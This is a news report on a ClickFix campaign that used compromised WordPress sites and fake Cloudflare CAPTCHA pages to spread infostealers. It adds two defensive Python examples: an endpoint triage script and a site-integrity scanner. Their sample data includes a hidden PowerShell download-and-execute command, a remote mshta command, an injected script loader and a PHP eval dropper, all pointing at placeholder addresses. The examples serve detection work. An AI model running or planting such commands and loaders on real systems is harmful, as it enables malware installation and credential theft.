Cybercriminals compromised over 250 WordPress sites globally, including a US Senate candidate's campaign page, to deliver infostealers through convincing fake Cloudflare CAPTCHA pages that trick users into executing malicious commands.

Cybercriminals have compromised more than 250 legitimate WordPress websites worldwide, including the campaign site of a US Senate candidate, to distribute infostealer malware through convincing fake CAPTCHA prompts.
The attack, detailed by Rapid7 researchers, injects malicious code into compromised WordPress sites that serve visitors a fake Cloudflare CAPTCHA page. Instead of the typical "I'm not a robot" checkbox, these prompts instruct users to copy and execute a command on their machine, which triggers the download of credential-stealing malware.
How the attack works
The scheme exploits the familiarity of Cloudflare's bot protection, which has become ubiquitous across the modern web. Visitors encountering what appears to be yet another verification step are instead being walked through the initial phase of infecting their own systems.
This technique follows the ClickFix social engineering playbook, where attackers persuade victims to execute commands themselves while believing they're completing a legitimate verification process. The malicious code is injected into otherwise legitimate websites, making the attack particularly effective since users trust the sites they're visiting.
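Because the victim pastes the command into the Run box themselves, a ClickFix infection leaves a distinctive endpoint trace: an interpreter such as powershell.exe or mshta.exe spawned by explorer.exe with a command line that fetches or decodes something from the network. The following Python is an added example, not code from the article or from Rapid7's report; the rule set, the process-creation events and the addresses (RFC 5737 documentation space) are all constructed, and the article does not disclose the actual command used in this campaign.

```python
"""Triage of Windows process-creation events (Sysmon Event ID 1 style) for
ClickFix-style execution: an interpreter whose parent is explorer.exe (the
Win+R Run box) and whose command line fetches or decodes a payload.
The events and the rule set below are constructed for this example."""
import re
from dataclasses import dataclass

# Interpreters and living-off-the-land binaries that ClickFix prompts ask users to run
LOLBINS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe",
           "cscript.exe", "certutil.exe", "curl.exe", "bitsadmin.exe"}

# Command-line indicators (hypothetical rule set, not the campaign's actual IOCs)
INDICATORS = {
    "download": re.compile(r"(?i)\b(iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring|"
                           r"downloadfile|curl|wget|certutil|bitsadmin)\b"),
    "exec": re.compile(r"(?i)\b(iex|invoke-expression|start-process|mshta|regsvr32|rundll32)\b"),
    "stealth_flags": re.compile(r"(?i)-(w(indowstyle)?\s+hidden|nop(rofile)?\b|ep\s+bypass|"
                                r"executionpolicy\s+bypass)"),
    "encoded": re.compile(r"(?i)(-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}|frombase64string)"),
    "remote_url": re.compile(r"(?i)https?://[^\s'\"]+"),
}


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(ev: ProcessEvent) -> list:
    """Names of the indicators that fire for one event; empty means not interesting."""
    if _basename(ev.image) not in LOLBINS:
        return []
    hits = ["interactive_parent"] if _basename(ev.parent_image) == "explorer.exe" else []
    hits += [name for name, rx in INDICATORS.items() if rx.search(ev.command_line)]
    return hits


def triage(events, min_hits: int = 3) -> list:
    """(event, hits) pairs with at least min_hits indicators, most indicators first."""
    scored = [(ev, score_event(ev)) for ev in events]
    flagged = [(ev, hits) for ev, hits in scored if len(hits) >= min_hits]
    return sorted(flagged, key=lambda pair: -len(pair[1]))


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed sample telemetry
    # 1. ClickFix: pasted into Win+R, hidden window, download cradle piped to iex
    ProcessEvent(r"C:\Windows\explorer.exe", PS,
                 "powershell -w hidden -c \"iex (iwr 'http://198.51.100.7/verify' -UseBasicParsing)\""),
    # 2. Benign: user opened Notepad from Explorer
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad.exe"),
    # 3. Admin opening an interactive shell: interactive parent only, no cradle
    ProcessEvent(r"C:\Windows\explorer.exe", PS, "powershell.exe -NoProfile"),
    # 4. ClickFix variant: mshta fetching a remote HTA
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
                 "mshta https://203.0.113.5/captcha.hta"),
    # 5. Scheduled task: same interpreter, non-interactive parent, local script
    ProcessEvent(r"C:\Windows\System32\svchost.exe", PS,
                 r"powershell -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"),
]

if __name__ == "__main__":
    for ev, hits in triage(SAMPLE_EVENTS):
        print(f"{len(hits)} indicators {hits}: {ev.command_line}")
```

The threshold of three indicators is what keeps an administrator's `powershell.exe -NoProfile` from the Run box (two indicators) below the line while the download cradle and the mshta variant are flagged. For forensics after the fact, commands typed into Win+R are also persisted under `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU`, which is worth collecting from any host whose user reports having "verified" themselves on a website.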
Scale and scope
According to Rapid7, the compromised websites represent a diverse range of organizations. Beyond the US Senate candidate's official webpage, affected sites include regional media outlets, small business websites, and various other legitimate domains.
The campaign has been active since at least December 2025, though some infrastructure dates back to July and August of the previous year. Rapid7 identified over 250 compromised websites across at least 12 countries: Australia, Brazil, Canada, Czechia, Germany, India, Israel, Singapore, Slovakia, Switzerland, the UK, and the US.
Technical sophistication
"The large-scale execution of the compromise across completely unrelated WordPress instances suggests a high level of automation by the threat actor and is likely part of an organized long-term criminal effort," said Rapid7 security researcher Milan Spinka.
The automation is the more concerning detail: it indicates the sites were not compromised one by one by hand but by a coordinated campaign with tooling that can find and infect unrelated WordPress instances at scale.
What happens after infection
Once victims follow the instructions on the fake verification page, the attack chain installs infostealer malware designed to quietly harvest valuable data from infected machines. This typically includes:
- Browser-stored credentials and authentication cookies
- Cryptocurrency wallet information
- Other sensitive digital information
These stolen credentials rarely remain with the original attackers. Infostealer logs are routinely packaged and sold on cybercrime marketplaces, where other criminals can purchase ready-made access to email accounts, corporate systems, and online services without having to conduct their own breaches.
Why compromised websites are effective delivery mechanisms
Using legitimate websites as the delivery mechanism provides attackers with crucial camouflage. Security tools and users alike are far less suspicious of established, trusted domains than of newly registered malware sites. The attackers effectively piggyback on the reputation and trust of whichever organization's website has been compromised.
Rapid7 has notified US authorities to investigate the issue and coordinate cleanup efforts. The inclusion of a US Senate candidate's campaign site among the compromised domains underscores the potential political implications of this campaign.
The attack highlights the ongoing challenge of securing WordPress installations and the creative ways cybercriminals exploit trusted web infrastructure to distribute malware. For website administrators, it is a reminder to keep WordPress core, themes and plugins updated, enforce strong authentication on administrative accounts, and monitor for unauthorized code changes.
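The last of those recommendations, monitoring for unauthorized code changes, is the one that would have caught this campaign on the server side, since the injected code has to live somewhere in the site's files or database. The following Python is an added example, not code from the article or from any WordPress project; it builds a SHA-256 manifest of a site's PHP/JS/HTML files, diffs it against a baseline, and scans changed files for the kind of script loader that serves a fake verification page. The sample site tree, the injected loader, the allow-listed hosts and the regex rule set are all constructed for the example and are not the indicators from the reported campaign.

```python
"""Two checks for unauthorized code changes in a WordPress install: a SHA-256
manifest diff against a known-good baseline, and a content scan of changed
files for injected script loaders. The site tree, the injected loader and the
rule set are constructed for this example, not taken from the reported campaign."""
import base64
import hashlib
import re
import tempfile
from pathlib import Path
from urllib.parse import urlparse

SCAN_SUFFIXES = {".php", ".js", ".html", ".htm"}

# Script hosts the theme legitimately loads from (assumed allow list for the example)
ALLOWED_SCRIPT_HOSTS = {"example-site.test", "cdnjs.cloudflare.com"}

# Hypothetical patterns for injected loaders and PHP droppers
PATTERNS = {
    "external_script": re.compile(r"(?is)<script[^>]+src\s*=\s*['\"]([^'\"]+)['\"]"),
    "js_obfuscation": re.compile(r"(?i)\b(atob|eval|String\.fromCharCode|unescape)\s*\("),
    "php_obfuscation": re.compile(r"(?i)\b(eval|assert)\s*\(\s*(base64_decode|gzinflate|"
                                  r"gzuncompress|str_rot13)\s*\("),
}


def build_manifest(root) -> dict:
    """Relative path -> SHA-256 for every scannable file under root."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in root.rglob("*") if p.is_file() and p.suffix.lower() in SCAN_SUFFIXES}


def diff_manifest(baseline: dict, current: dict) -> dict:
    """Files added, removed or modified since the baseline was taken."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in set(baseline) & set(current) if baseline[p] != current[p]),
    }


def find_injections(text: str) -> list:
    """(kind, detail) pairs for suspicious script loaders in one file's text."""
    findings = []
    for m in PATTERNS["external_script"].finditer(text):
        host = urlparse(m.group(1)).hostname
        if host and host not in ALLOWED_SCRIPT_HOSTS:  # a relative src has no host
            findings.append(("external_script", host))
    for kind in ("js_obfuscation", "php_obfuscation"):
        findings += [(kind, m.group(0)) for m in PATTERNS[kind].finditer(text)]
    return findings


def scan_changed(root, diff: dict) -> dict:
    """Run find_injections over every added or modified file; keep non-empty results."""
    root = Path(root)
    results = {}
    for rel in diff["added"] + diff["modified"]:
        hits = find_injections((root / rel).read_text(errors="replace"))
        if hits:
            results[rel] = hits
    return results


def run_demo() -> dict:
    """Build a tiny constructed site, baseline it, simulate a compromise, report."""
    with tempfile.TemporaryDirectory() as tmp:
        site = Path(tmp)
        header = site / "wp-content" / "themes" / "demo" / "header.php"
        header.parent.mkdir(parents=True)
        header.write_text('<?php wp_head(); ?>\n'
                          '<script src="/wp-includes/js/jquery/jquery.min.js"></script>\n')
        (site / "wp-config.php").write_text("<?php define('DB_NAME', 'wp');\n")
        baseline = build_manifest(site)  # in practice: stored off-host at deploy time

        # Simulated compromise: a loader appended to the theme header plus a dropped
        # PHP file. 203.0.113.9 is documentation address space, not a real C2.
        loader_url = base64.b64encode(b"http://203.0.113.9/check.js").decode()
        header.write_text(header.read_text()
                          + '<script src="https://203.0.113.9/verify.js"></script>\n'
                          + f'<script>var s=document.createElement("script");s.src=atob("{loader_url}");'
                            'document.head.appendChild(s)</script>\n')
        dropped = site / "wp-content" / "uploads" / "cache.php"
        dropped.parent.mkdir(parents=True)
        dropped.write_text("<?php eval(base64_decode('%s'));\n"
                           % base64.b64encode(b"echo 1;").decode())

        diff = diff_manifest(baseline, build_manifest(site))
        return {"diff": diff, "findings": scan_changed(site, diff)}


if __name__ == "__main__":
    report = run_demo()
    print(report["diff"])
    for path, hits in report["findings"].items():
        print(path, hits)
```

Two caveats for using this for real. The baseline must be stored somewhere the web server cannot write to, otherwise an attacker with file-write access on the site simply refreshes it; for core files, WP-CLI's `wp core verify-checksums` avoids the problem by comparing against the checksums published by WordPress.org. And a file manifest sees only the filesystem: injected scripts are just as often stored in the database (theme options, widgets, post content), so the content scan should also be run over exports of those tables.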
